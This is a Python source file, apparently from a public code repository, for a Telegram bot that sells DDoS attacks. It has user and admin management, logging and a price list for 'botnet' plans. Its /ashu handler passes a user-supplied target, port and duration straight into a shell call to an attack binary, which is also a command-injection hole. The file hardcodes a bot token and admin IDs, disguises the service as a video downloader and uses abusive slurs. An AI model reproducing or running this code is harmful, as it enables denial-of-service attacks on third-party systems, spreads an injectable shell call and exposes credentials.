-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathM.py
378 lines (317 loc) Β· 13 KB
/
M.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
#!/usr/bin/python3
#By Indian @xavlue
import telebot
import subprocess
import requests
import datetime
import os
# insert your Telegram bot token here
bot = telebot.TeleBot('7428256268:AAEgxrwhMgzq9Fzv2g6j48SYIpbMQbglqwI')
# Admin user IDs
admin_id = ["5728282067", "5343126447"]
# File to store allowed user IDs
USER_FILE = "users.txt"
# File to store command logs
LOG_FILE = "log.txt"
# Function to read user IDs from the file
def read_users():
try:
with open(USER_FILE, "r") as file:
return file.read().splitlines()
except FileNotFoundError:
return []
# Function to read free user IDs and their credits from the file
def read_free_users():
try:
with open(FREE_USER_FILE, "r") as file:
lines = file.read().splitlines()
for line in lines:
if line.strip(): # Check if line is not empty
user_info = line.split()
if len(user_info) == 2:
user_id, credits = user_info
free_user_credits[user_id] = int(credits)
else:
print(f"Ignoring invalid line in free user file: {line}")
except FileNotFoundError:
pass
# List to store allowed user IDs
allowed_user_ids = read_users()
# Function to log command to the file
def log_command(user_id, target, port, time):
user_info = bot.get_chat(user_id)
if user_info.username:
username = "@" + user_info.username
else:
username = f"UserID: {user_id}"
with open(LOG_FILE, "a") as file: # Open in "append" mode
file.write(f"Username: {username}\nTarget: {target}\nPort: {port}\nTime: {time}\n\n")
# Function to clear logs
def clear_logs():
try:
with open(LOG_FILE, "r+") as file:
if file.read() == "":
response = "Logs are already cleared. No data found."
else:
file.truncate(0)
response = "Logs cleared successfully"
except FileNotFoundError:
response = "No logs found to clear."
return response
# Function to record command logs
def record_command_logs(user_id, command, target=None, port=None, time=None):
log_entry = f"UserID: {user_id} | Time: {datetime.datetime.now()} | Command: {command}"
if target:
log_entry += f" | Target: {target}"
if port:
log_entry += f" | Port: {port}"
if time:
log_entry += f" | Time: {time}"
with open(LOG_FILE, "a") as file:
file.write(log_entry + "\n")
@bot.message_handler(commands=['add'])
def add_user(message):
user_id = str(message.chat.id)
if user_id in admin_id:
command = message.text.split()
if len(command) > 1:
user_to_add = command[1]
if user_to_add not in allowed_user_ids:
allowed_user_ids.append(user_to_add)
with open(USER_FILE, "a") as file:
file.write(f"{user_to_add}\n")
response = f"User {user_to_add} Added Successfully."
else:
response = "User already exists."
else:
response = "Please specify a user ID to add."
else:
response = "Only Ansh Papa can send this command."
bot.reply_to(message, response)
@bot.message_handler(commands=['remove'])
def remove_user(message):
user_id = str(message.chat.id)
if user_id in admin_id:
command = message.text.split()
if len(command) > 1:
user_to_remove = command[1]
if user_to_remove in allowed_user_ids:
allowed_user_ids.remove(user_to_remove)
with open(USER_FILE, "w") as file:
for user_id in allowed_user_ids:
file.write(f"{user_id}\n")
response = f"User {user_to_remove} removed successfully."
else:
response = f"User {user_to_remove} not found in the list."
else:
response = '''Please Specify A User ID to Remove.
Usage: /remove <userid>'''
else:
response = "Only Ansh Papa Can Run This Command."
bot.reply_to(message, response)
@bot.message_handler(commands=['clearlogs'])
def clear_logs_command(message):
user_id = str(message.chat.id)
if user_id in admin_id:
try:
with open(LOG_FILE, "r+") as file:
log_content = file.read()
if log_content.strip() == "":
response = "Logs are already cleared. No data found."
else:
file.truncate(0)
response = "Logs Cleared Successfully"
except FileNotFoundError:
response = "Logs are already cleared."
else:
response = "Only Ansh Papa Can Run This Command."
bot.reply_to(message, response)
@bot.message_handler(commands=['allusers'])
def show_all_users(message):
user_id = str(message.chat.id)
if user_id in admin_id:
try:
with open(USER_FILE, "r") as file:
user_ids = file.read().splitlines()
if user_ids:
response = "Chutiya hai kya :\n"
for user_id in user_ids:
try:
user_info = bot.get_chat(int(user_id))
username = user_info.username
response += f"- @{username} (ID: {user_id})\n"
except Exception as e:
response += f"- User ID: {user_id}\n"
else:
response = "No data found"
except FileNotFoundError:
response = "No data found"
else:
response = "Only Ansh Papa Can Run This Command."
bot.reply_to(message, response)
@bot.message_handler(commands=['logs'])
def show_recent_logs(message):
user_id = str(message.chat.id)
if user_id in admin_id:
if os.path.exists(LOG_FILE) and os.stat(LOG_FILE).st_size > 0:
try:
with open(LOG_FILE, "rb") as file:
bot.send_document(message.chat.id, file)
except FileNotFoundError:
response = "No data found."
bot.reply_to(message, response)
else:
response = "No data found"
bot.reply_to(message, response)
else:
response = "Only Ansh Papa Can Run This Command."
bot.reply_to(message, response)
@bot.message_handler(commands=['id'])
def show_user_id(message):
user_id = str(message.chat.id)
response = f"Your ID: {user_id}"
bot.reply_to(message, response)
# Function to handle the reply when free users run the /ashu command
def start_attack_reply(message, target, port, time):
user_info = message.from_user
username = user_info.username if user_info.username else user_info.first_name
response = f"{username}, Sexy videos download successfully.......\n\nπππ«π ππ: {target}\nππ¨π«π: {port}\nππ’π¦π: {time} ππππ¨π§ππ¬\nππππ‘π¨π: Lauda Lashun...\nBy Indian @xavlue"
bot.reply_to(message, response)
# Dictionary to store the last time each user ran the /ashu command
ashu_cooldown = {}
COOLDOWN_TIME =1
# Handler for /ashu command
@bot.message_handler(commands=['ashu'])
def handle_ashu(message):
user_id = str(message.chat.id)
if user_id in allowed_user_ids:
# Check if the user is in admin_id (admins have no cooldown)
if user_id not in admin_id:
# Check if the user has run the command before and is still within the cooldown period
if user_id in ashu_cooldown and (datetime.datetime.now() - ashu_cooldown[user_id]).seconds < 0:
response = "You Are On Cooldown. Please Wait 5min Before Running The /ashu Command Again."
bot.reply_to(message, response)
return
# Update the last time the user ran the command
ashu_cooldown[user_id] = datetime.datetime.now()
command = message.text.split()
if len(command) == 4: # Updated to accept target, time, and port
target = command[1]
port = int(command[2]) # Convert time to integer
time = int(command[3]) # Convert port to integer
if time > 1000:
response = "Error: Time interval must be less than 1000."
else:
record_command_logs(user_id, '/ashu', target, port, time)
log_command(user_id, target, port, time)
start_attack_reply(message, target, port, time) # Call start_attack_reply function
full_command = f"./ashu {target} {port} {time} 200"
subprocess.run(full_command, shell=True)
response = f"ashu Attack Finished. Target: {target} Port: {port} Port: {time}"
else:
response = "Usage :- /ashu <BAHENCOD SPAM MAT KR LAUDE>\nSALE USE KRO SS DO" # Updated command syntax
else:
response = "Tumahra gand ka bil chota hai.\nBy Indian @xavlue"
bot.reply_to(message, response)
# Add /mylogs command to display logs recorded for ashu and website commands
@bot.message_handler(commands=['mylogs'])
def show_command_logs(message):
user_id = str(message.chat.id)
if user_id in allowed_user_ids:
try:
with open(LOG_FILE, "r") as file:
command_logs = file.readlines()
user_logs = [log for log in command_logs if f"UserID: {user_id}" in log]
if user_logs:
response = "Your Command Logs:\n" + "".join(user_logs)
else:
response = "No Command Logs Found For You."
except FileNotFoundError:
response = "No command logs found."
else:
response = "BC @Land_se puch."
bot.reply_to(message, response)
@bot.message_handler(commands=['help'])
def show_help(message):
help_text = '''Available commands:
/ashu : Method For ashu ki maa Chodne.
/rules : Please Check Before Use !!.
/mylogs : To Check Your Recents Attacks.
/plan : Checkout Our Botnet Rates.
To See Ansh Papa Commands:
/ansh : Shows All Ansh Papa Commands.
By Indian @xavlue
'''
for handler in bot.message_handlers:
if hasattr(handler, 'commands'):
if message.text.startswith('/help'):
help_text += f"{handler.commands[0]}: {handler.doc}\n"
elif handler.doc and 'admin' in handler.doc.lower():
continue
else:
help_text += f"{handler.commands[0]}: {handler.doc}\n"
bot.reply_to(message, help_text)
@bot.message_handler(commands=['start'])
def welcome_start(message):
user_name = message.from_user.first_name
response = f"Welcome Lauda lashun bot, {user_name}! Free sexy video downloading......\nTry To Download sex videos: /help\nWelcome To The World's Best Sexy Video download bot\nBy Indian @Bgmi"
bot.reply_to(message, response)
@bot.message_handler(commands=['rules'])
def welcome_rules(message):
user_name = message.from_user.first_name
response = f'''{user_name} Please Follow These Rules:
1. Dont Run Too Many Attacks !! Cause A Ban From Bot
2. Dont Run 2 Attacks At Same Time Becz If U Then U Got Banned From Bot.
3. We Daily Checks The Logs So Follow these rules to avoid Ban!!
By Indian @xavlue'''
bot.reply_to(message, response)
@bot.message_handler(commands=['plan'])
def welcome_plan(message):
user_name = message.from_user.first_name
response = f'''{user_name}, Brother Only 1 Plan Is Powerfull Then Any Other Ddos !!:
Vip :
-> Attack Time : 200 (S)
> After Attack Limit : 2 Min
-> Concurrents Attack : 300
Pr-ice List:
Day-->10 Rs
Week-->90 Rs
Month-->160 Rs
By Indian @xavlue
'''
bot.reply_to(message, response)
@bot.message_handler(commands=['ansh'])
def welcome_plan(message):
user_name = message.from_user.first_name
response = f'''{user_name}, Ansh Papa Commands Are Here!!:
/add <userId> : Add a User.
/remove <userid> Remove a User.
/allusers : Authorised Users Lists.
/logs : All Users Logs.
/broadcast : Broadcast a Message.
/clearlogs : Clear The Logs File.
By Indian @xavlue
'''
bot.reply_to(message, response)
@bot.message_handler(commands=['broadcast'])
def broadcast_message(message):
user_id = str(message.chat.id)
if user_id in admin_id:
command = message.text.split(maxsplit=1)
if len(command) > 1:
message_to_broadcast = "Message To All Users By Ansh Papa:\n\n" + command[1]
with open(USER_FILE, "r") as file:
user_ids = file.read().splitlines()
for user_id in user_ids:
try:
bot.send_message(user_id, message_to_broadcast)
except Exception as e:
print(f"Failed to send broadcast message to user {user_id}: {str(e)}")
response = "Broadcast Message Sent Successfully To All Users."
else:
response = "Please Provide A Message To Broadcast."
else:
response = "Only Papa Can Run This Command."
bot.reply_to(message, response)
bot.polling()
#By Indian @xavlue